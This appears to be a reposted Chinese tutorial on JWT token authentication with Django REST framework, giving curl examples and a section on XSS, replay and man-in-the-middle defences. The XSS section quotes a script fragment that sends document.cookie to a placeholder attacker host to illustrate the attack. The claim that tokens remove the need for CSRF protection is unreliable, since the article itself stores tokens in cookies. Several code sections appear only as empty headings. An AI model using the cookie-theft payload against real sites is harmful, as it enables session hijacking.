一步一步教你基于JWT的Token認(rèn)證機(jī)制實(shí)現(xiàn)，以及如何防范XSS攻擊、Replay攻擊和中間人攻擊。

文章目錄

一、幾種常用的認(rèn)證機(jī)制

1.1 HTTP Basic Auth

HTTP Basic Auth簡(jiǎn)單點(diǎn)說(shuō)明就是每次請(qǐng)求API時(shí)都提供用戶的username和password，簡(jiǎn)言之，Basic Auth是配合RESTful API 使用的最簡(jiǎn)單的認(rèn)證方式，只需提供用戶名密碼即可，但由于有把用戶名密碼暴露給第三方客戶端的風(fēng)險(xiǎn)，在生產(chǎn)環(huán)境下被使用的越來(lái)越少。因此，在開(kāi)發(fā)對(duì)外開(kāi)放的RESTful API時(shí)，盡量避免采用HTTP Basic Auth。

1.2 OAuth

OAuth(開(kāi)放授權(quán))是一個(gè)開(kāi)放的授權(quán)標(biāo)準(zhǔn)，允許用戶讓第三方應(yīng)用訪問(wèn)該用戶在某一web服務(wù)上存儲(chǔ)的私密的資源(如照片，視頻，聯(lián)系人列表)，而無(wú)需將用戶名和密碼提供給第三方應(yīng)用。

OAuth允許用戶提供一個(gè)令牌，而不是用戶名和密碼來(lái)訪問(wèn)他們存放在特定服務(wù)提供者的數(shù)據(jù)。每一個(gè)令牌授權(quán)一個(gè)特定的第三方系統(tǒng)(例如，視頻編輯網(wǎng)站)在特定的時(shí)段(例如，接下來(lái)的2小時(shí)內(nèi))內(nèi)訪問(wèn)特定的資源(例如僅僅是某一相冊(cè)中的視頻)。這樣，OAuth讓用戶可以授權(quán)第三方網(wǎng)站訪問(wèn)他們存儲(chǔ)在另外服務(wù)提供者的某些特定信息，而非所有內(nèi)容

下面是OAuth2.0的流程：

這種基于OAuth的認(rèn)證機(jī)制適用于個(gè)人消費(fèi)者類的互聯(lián)網(wǎng)產(chǎn)品，如社交類APP等應(yīng)用，但是不太適合擁有自有認(rèn)證權(quán)限管理的企業(yè)應(yīng)用；

1.3 Cookie Auth

Cookie認(rèn)證機(jī)制就是為一次請(qǐng)求認(rèn)證在服務(wù)端創(chuàng)建一個(gè)Session對(duì)象，同時(shí)在客戶端的瀏覽器端創(chuàng)建了一個(gè)Cookie對(duì)象；通過(guò)客戶端帶上來(lái)Cookie對(duì)象來(lái)與服務(wù)器端的session對(duì)象匹配來(lái)實(shí)現(xiàn)狀態(tài)管理的。默認(rèn)的，當(dāng)我們關(guān)閉瀏覽器的時(shí)候，cookie會(huì)被刪除。但可以通過(guò)修改cookie 的expire time使cookie在一定時(shí)間內(nèi)有效；

1.4 Token Auth

1.4.1 Token Auth的優(yōu)點(diǎn)

Token機(jī)制相對(duì)于Cookie機(jī)制又有什么好處呢？支持跨域訪問(wèn)： Cookie是不允許垮域訪問(wèn)的，這一點(diǎn)對(duì)Token機(jī)制是不存在的，前提是傳輸?shù)挠脩粽J(rèn)證信息通過(guò)HTTP頭傳輸。

無(wú)狀態(tài)(也稱：服務(wù)端可擴(kuò)展行)：Token機(jī)制在服務(wù)端不需要存儲(chǔ)session信息，因?yàn)門oken 自身包含了所有登錄用戶的信息，只需要在客戶端的cookie或本地介質(zhì)存儲(chǔ)狀態(tài)信息。

更適用CDN： 可以通過(guò)內(nèi)容分發(fā)網(wǎng)絡(luò)請(qǐng)求你服務(wù)端的所有資料(如：javascript，HTML,圖片等)，而你的服務(wù)端只要提供API即可。

去耦： 不需要綁定到一個(gè)特定的身份驗(yàn)證方案。Token可以在任何地方生成，只要在你的API被調(diào)用的時(shí)候，你可以進(jìn)行Token生成調(diào)用即可。

更適用于移動(dòng)應(yīng)用： 當(dāng)你的客戶端是一個(gè)原生平臺(tái)(iOS, Android，Windows 8等)時(shí)，Cookie是不被支持的(你需要通過(guò)Cookie容器進(jìn)行處理)，這時(shí)采用Token認(rèn)證機(jī)制就會(huì)簡(jiǎn)單得多。

CSRF：因?yàn)椴辉僖蕾囉贑ookie，所以你就不需要考慮對(duì)CSRF(跨站請(qǐng)求偽造)的防范。

性能： 一次網(wǎng)絡(luò)往返時(shí)間(通過(guò)數(shù)據(jù)庫(kù)查詢session信息)總比做一次HMACSHA256計(jì)算 的Token驗(yàn)證和解析要費(fèi)時(shí)得多。

不需要為登錄頁(yè)面做特殊處理： 如果你使用Protractor 做功能測(cè)試的時(shí)候，不再需要為登錄頁(yè)面做特殊處理。

基于標(biāo)準(zhǔn)化：你的API可以采用標(biāo)準(zhǔn)化的 JSON Web Token (JWT)。這個(gè)標(biāo)準(zhǔn)已經(jīng)存在多個(gè)后端庫(kù)(.NET, Ruby, Java,Python,?PHP)和多家公司的支持(如：Firebase,Google, Microsoft)。

二、基于JWT的Token認(rèn)證機(jī)制實(shí)現(xiàn)

JSON Web Token(JWT)是一個(gè)非常輕巧的規(guī)范。這個(gè)規(guī)范允許我們使用JWT在用戶和服務(wù)器之間傳遞安全可靠的信息。

2.1 JWT的組成

一個(gè)JWT實(shí)際上就是一個(gè)字符串，它由三部分組成，頭部、載荷與簽名。形式為：

A.B.C

2.1.1 頭部(Header)

JWT需要一個(gè)頭部，頭部用于描述關(guān)于該JWT的最基本的信息，例如其類型以及簽名所用的算法等。這也可以被表示成一個(gè)JSON對(duì)象。

{“typ”: “JWT”,”alg”: “HS256”}

在頭部指明了簽名算法是HS256算法。

當(dāng)然頭部也要進(jìn)行BASE64編碼，編碼后的字符串如下：

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9

2.1.2 載荷(Payload)

{ “iss”: “Online JWT Builder”, ??“iat”: 1416797419, ??“exp”: 1448333419, ??“aud”: “www.example.com”, ??“sub”: “jrocket@example.com”, ??“GivenName”: “Johnny”, ??“Surname”: “Rocket”, ??“Email”: “jrocket@example.com”, ??“Role”: [ “Manager”, “Project Administrator” ] }iss： 該JWT的簽發(fā)者，是否使用是可選的；

sub： 該JWT所面向的用戶，是否使用是可選的；

aud： 接收該JWT的一方，是否使用是可選的；

exp(expires)： 什么時(shí)候過(guò)期，這里是一個(gè)Unix時(shí)間戳，是否使用是可選的；

iat(issued at)： 在什么時(shí)候簽發(fā)的(UNIX時(shí)間)，是否使用是可選的；

其他還有：nbf (Not Before)：如果當(dāng)前時(shí)間在nbf里的時(shí)間之前，則Token不被接受；一般都會(huì)留一些余地，比如幾分鐘；是否使用是可選的；

將上面的JSON對(duì)象進(jìn)行[base64編碼]可以得到下面的字符串。這個(gè)字符串我們將它稱作JWT的Payload(載荷)。

eyJpc3MiOiJKb2huIFd1IEpXVCIsImlhdCI6MTQ0MTU5MzUwMiwiZXhwIjoxNDQxNTk0NzIyLCJhdWQiOiJ3d3cuZXhhbXBsZS5jb20iLCJzdWIiOiJqcm9ja2V0QGV4YW1wbGUuY29tIiwiZnJvbV91c2VyIjoiQiIsInRhcmdldF91c2VyIjoiQSJ9

一個(gè)最基本最簡(jiǎn)單最常用的payload為：

{

“user_id” => 123456, #用戶id，表明用戶

“iat” => 1356999524, #token發(fā)布時(shí)間

“exp” => 1556999524, #token過(guò)期時(shí)間

}

2.1.3 簽名(Signature)

將上面的兩個(gè)編碼后的字符串都用句號(hào).連接在一起(頭部在前)，就形成了：

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0

最后，我們將上面拼接完的字符串用HS256算法進(jìn)行加密。在加密的時(shí)候，我們還需要提供一個(gè)密鑰(secret)。如果我們用mystar作為密鑰的話，那么就可以得到我們加密后的內(nèi)容：

rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM

最后將這一部分簽名也拼接在被簽名的字符串后面，我們就得到了完整的JWT：

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM

在我們的請(qǐng)求URL中會(huì)帶上這串JWT字符串：

https://your.awesome-app.com/make-friend/?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM也可以在http頭中加Authorization頭或在cookie帶上

2.2 認(rèn)證過(guò)程

下面我們從一個(gè)實(shí)例來(lái)看如何運(yùn)用JWT機(jī)制實(shí)現(xiàn)認(rèn)證：

2.2.1 登錄第一次認(rèn)證：第一次登錄，用戶從瀏覽器輸入用戶名/密碼，提交后到服務(wù)器的登錄處理的Action層(Login Action)；

Login Action調(diào)用認(rèn)證服務(wù)進(jìn)行用戶名密碼認(rèn)證，如果認(rèn)證通過(guò)，Login Action層調(diào)用用戶信息服務(wù)獲取用戶信息(包括完整的用戶信息及對(duì)應(yīng)權(quán)限信息)；

返回用戶信息后，Login Action從配置文件中獲取Token簽名生成的秘鑰信息，進(jìn)行Token的生成；

生成Token的過(guò)程中可以調(diào)用第三方的JWT Lib生成簽名后的JWT數(shù)據(jù)；

完成JWT數(shù)據(jù)簽名后，將其設(shè)置到COOKIE對(duì)象中，并重定向到首頁(yè)，完成登錄過(guò)程；

2.2.2 請(qǐng)求認(rèn)證

基于Token的認(rèn)證機(jī)制會(huì)在每一次請(qǐng)求中都帶上完成簽名的Token信息，這個(gè)Token信息可能在COOKIE中，也可能在HTTP的Authorization頭中；

客戶端(APP客戶端或?yàn)g覽器)通過(guò)GET或POST請(qǐng)求訪問(wèn)資源(頁(yè)面或調(diào)用API)；

認(rèn)證服務(wù)作為一個(gè)Middleware HOOK 對(duì)請(qǐng)求進(jìn)行攔截，首先在cookie中查找Token信息，如果沒(méi)有找到，則在HTTP Authorization Head中查找；

如果找到Token信息，則根據(jù)配置文件中的簽名加密秘鑰，調(diào)用JWT Lib對(duì)Token信息進(jìn)行解密和解碼；

完成解碼并驗(yàn)證簽名通過(guò)后，對(duì)Token中的exp、nbf、aud等信息進(jìn)行驗(yàn)證；

全部通過(guò)后，根據(jù)獲取的用戶的角色權(quán)限信息，進(jìn)行對(duì)請(qǐng)求的資源的權(quán)限邏輯判斷；

如果權(quán)限邏輯判斷通過(guò)則通過(guò)Response對(duì)象返回；否則則返回HTTP 401；

2.3 對(duì)Token認(rèn)證的五點(diǎn)認(rèn)識(shí)

對(duì)Token認(rèn)證機(jī)制有5點(diǎn)直接注意的地方：一個(gè)Token就是一些信息的集合；

在Token中包含足夠多的信息，以便在后續(xù)請(qǐng)求中減少查詢數(shù)據(jù)庫(kù)的幾率；

服務(wù)端需要對(duì)cookie和HTTP Authrorization Header進(jìn)行Token信息的檢查；

基于上一點(diǎn)，你可以用一套token認(rèn)證代碼來(lái)面對(duì)瀏覽器類客戶端和非瀏覽器類客戶端；

因?yàn)閠oken是被簽名的，所以我們可以認(rèn)為一個(gè)可以解碼認(rèn)證通過(guò)的token是由我們系統(tǒng)發(fā)放的，其中帶的信息是合法有效的；

三、JWT的Django REST framework實(shí)現(xiàn)

3.1 前置條件Python (2.7, 3.3, 3.4, 3.5)

Django (1.8, 1.9, 1.10)

Django REST Framework (3.0, 3.1, 3.2, 3.3, 3.4, 3.5)

3.2 下載安裝

pip install djangorestframework-jwt

3.3 實(shí)例解析

3.3.1 settings.py

3.3.2 urls.py

3.3.3 views.py

3.3.4 請(qǐng)求與返回結(jié)果

3.3.4.1 登錄

請(qǐng)求：

curl -X POST -d “username=admin&password=password123”?http://localhost:8000/login/

返回：

{“status”:”authentication successfully.”,”token”:”eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwib3JpZ19pYXQiOjE0OTkzOTU0MDUsImlzcyI6Imh0dHBzOi8vcG9tYS5uc2ZvY3VzLmNvbSIsImV4cCI6MTQ5OTM5OTAwNSwidXNlcl9pZCI6NCwiZW1haWwiOiJwb21hQG5zZm9jdXMuY29tIn0.l6QPg6iUpXXiJ0II7RqYiRunRXu10SikdU8IjirDDqA”}

3.3.4.2 獲取token

請(qǐng)求：

$ curl -X POST -d “username=admin&password=password123”?http://localhost:8000/api-token-auth/

或

$ curl -X POST -H “Content-Type: application/json” -d ‘{“username”:”admin”,”password”:”password123″}’?http://localhost:8000/api-token-auth/

返回：

{“token”:”eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwib3JpZ19pYXQiOjE0OTkzOTU2OTIsImlzcyI6Imh0dHBzOi8vcG9tYS5uc2ZvY3VzLmNvbSIsImV4cCI6MTQ5OTM5OTI5MiwidXNlcl9pZCI6NCwiZW1haWwiOiJwb21hQG5zZm9jdXMuY29tIn0.XJ5xYY0xeb3TDqGMBRPGdU3s_UBn7SWcJIR2emLB0j0″}

3.3.4.3刷新token

請(qǐng)求：

$ curl -X POST -H “Content-Type: application/json” -d ‘{“token”:””}’?http://localhost:8000/api-token-refresh/

curl -X POST -H “Content-Type: application/json” -d ‘{“token”:”eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwib3JpZ19pYXQiOjE0OTkzOTU0MDUsImlzcyI6Imh0dHBzOi8vcG9tYS5uc2ZvY3VzLmNvbSIsImV4cCI6MTQ5OTM5OTAwNSwidXNlcl9pZCI6NCwiZW1haWwiOiJwb21hQG5zZm9jdXMuY29tIn0.l6QPg6iUpXXiJ0II7RqYiRunRXu10SikdU8IjirDDqA”}’ http://localhost:8000/api-token-refresh/

返回：

{“token”:”eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwib3JpZ19pYXQiOjE0OTkzOTU0MDUsImlzcyI6Imh0dHBzOi8vcG9tYS5uc2ZvY3VzLmNvbSIsImV4cCI6MTQ5OTM5OTM3MCwidXNlcl9pZCI6NCwiZW1haWwiOiJwb21hQG5zZm9jdXMuY29tIn0.MyhFTXbGBmuh3APQjbeZbRM4e64VN1MvcfumfNSXuOg”}

3.3.4.4 驗(yàn)證token

請(qǐng)求：

$ curl -X POST -H “Content-Type: application/json” -d ‘{“token”:””}’ http://localhost:8000/api-token-verify/

返回：

{“token”:”. . . .”}

3.3.4.5 訪問(wèn)受保護(hù)的urls

請(qǐng)求：

$ curl -H “Authorization: JWT ” http://localhost:8000/protected-url/

curl -H “Authorization: TOKEN eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwib3JpZ19pYXQiOjE0OTkzOTU0MDUsImlzcyI6Imh0dHBzOi8vcG9tYS5uc2ZvY3VzLmNvbSIsImV4cCI6MTQ5OTM5OTAwNSwidXNlcl9pZCI6NCwiZW1haWwiOiJwb21hQG5zZm9jdXMuY29tIn0.l6QPg6iUpXXiJ0II7RqYiRunRXu10SikdU8IjirDDqA” http://localhost:8000/example/

返回：

{“user”:”admin”,”auth”:”eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwib3JpZ19pYXQiOjE0OTkzOTU0MDUsImlzcyI6Imh0dHBzOi8vcG9tYS5uc2ZvY3VzLmNvbSIsImV4cCI6MTQ5OTM5OTAwNSwidXNlcl9pZCI6NCwiZW1haWwiOiJwb21hQG5zZm9jdXMuY29tIn0.l6QPg6iUpXXiJ0II7RqYiRunRXu10SikdU8IjirDDqA”}

3.4 源碼

3.4.1 獲取token

3.4.2 驗(yàn)證token

3.4.3 刷新token

四、基于JWT的Token認(rèn)證的安全問(wèn)題

4.1 確保驗(yàn)證過(guò)程的安全性

如何保證用戶名/密碼驗(yàn)證過(guò)程的安全性；因?yàn)樵隍?yàn)證過(guò)程中，需要用戶輸入用戶名和密碼，在這一過(guò)程中，用戶名、密碼等敏感信息需要在網(wǎng)絡(luò)中傳輸。因此，在這個(gè)過(guò)程中建議采用HTTPS，通過(guò)SSL加密傳輸，以確保通道的安全性。

4.2 如何防范XSS Attacks

瀏覽器可以做很多事情，這也給瀏覽器端的安全帶來(lái)很多隱患，最常見(jiàn)的如：XSS攻擊：跨站腳本攻擊(Cross Site Scripting)；如果有個(gè)頁(yè)面的輸入框中允許輸入任何信息，且沒(méi)有做防范措施，如果我們輸入下面這段代碼：

a.src=’https://hackmeplz.com/yourCookies.png/?cookies=’+document.cookie;return a}())”

這段代碼會(huì)盜取你域中的所有cookie信息，并發(fā)送到 hackmeplz.com；那么我們?nèi)绾蝸?lái)防范這種攻擊呢？XSS攻擊代碼過(guò)濾

移除任何會(huì)導(dǎo)致瀏覽器做非預(yù)期執(zhí)行的代碼，這個(gè)可以采用一些庫(kù)來(lái)實(shí)現(xiàn)；如果你是將用戶提交的字符串存儲(chǔ)到數(shù)據(jù)庫(kù)的話(也針對(duì)SQL注入攻擊)，你需要在前端和服務(wù)端分別做過(guò)濾；采用HTTP-Only Cookies

通過(guò)設(shè)置Cookie的參數(shù)：HttpOnly；Secure 來(lái)防止通過(guò)JavaScript 來(lái)訪問(wèn)Cookie；

4.3 如何防范Replay Attacks

所謂重放攻擊就是攻擊者發(fā)送一個(gè)目的主機(jī)已接收過(guò)的包，來(lái)達(dá)到欺騙系統(tǒng)的目的，主要用于身份認(rèn)證過(guò)程。比如在瀏覽器端通過(guò)用戶名/密碼驗(yàn)證獲得簽名的Token被木馬竊取。即使用戶登出了系統(tǒng)，黑客還是可以利用竊取的Token模擬正常請(qǐng)求，而服務(wù)器端對(duì)此完全不知道，以為JWT機(jī)制是無(wú)狀態(tài)的。

幾種常用做僅供參考：縮短token的有效時(shí)間；

限制token的使用次數(shù)？ (如果這樣，需要記錄已生成的token)

4.4 如何防范MITM (Man-In-The-Middle)Attacks

所謂MITM攻擊，就是在客戶端和服務(wù)器端的交互過(guò)程被監(jiān)聽(tīng)，比如像可以上網(wǎng)的咖啡館的WIFI被監(jiān)聽(tīng)或者被黑的代理服務(wù)器等；

針對(duì)這類攻擊的辦法使用HTTPS，包括針對(duì)分布式應(yīng)用，在服務(wù)間傳輸像cookie這類敏感信息時(shí)也采用HTTPS。

五、參考

總結(jié)

以上是生活随笔為你收集整理的jwt重放攻击_【干货分享】基于JWT的Token认证机制及安全问题的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。